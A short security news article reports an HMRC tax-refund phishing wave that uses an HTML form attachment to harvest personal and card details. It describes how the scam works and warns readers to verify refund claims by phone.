14 DAY TRIAL // Security researchers from Belgian email security provider MX Lab warn about a new wave of HMRC tax refund phishing emails that is currently hitting people's email inboxes.
The rogue emails have forged headers to appear as originating from a [email protected] address and bear a subject of "Please Submit Your Payment Refund."
The tax refund theme is extremely common, not only with phishing emails spoofing the HMRC, but also with those targeting taxpayers in other countries.
There is, however, one particular aspect that sets this spam run apart. The emails discourage recipients from calling HMRC, something which both the tax agency and security researchers have advised for years.
In addition, unlike most phsihing emails which direct users to a rogue website, these ones have an HTML attached to them.
"Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In oder to process your refund you will need to complete the application form attached to this email," the email's body reads.
The attachment is called Refund_Form.htm and displays an HMRC-branded page for inputting personal and credit card details. As also seen in other phishing scams, images displayed on the page are loaded directly from the legit hmrc.gov.uk domain.
After submitting the form, users are redirected to the real HMRC website in order to avoid raising suspicions. Meanwhile, the inputted information is sent to an Yahoo! email address.
Apparently, there is also a second, more traditional, phishing campaign using fake HMRC tax refund notifications, going around. However, this one uses links to an external site.
Despite recommendations to the contrary, users are strongly encouraged to verify all financial-related claims with the corresponding organizations over the phone.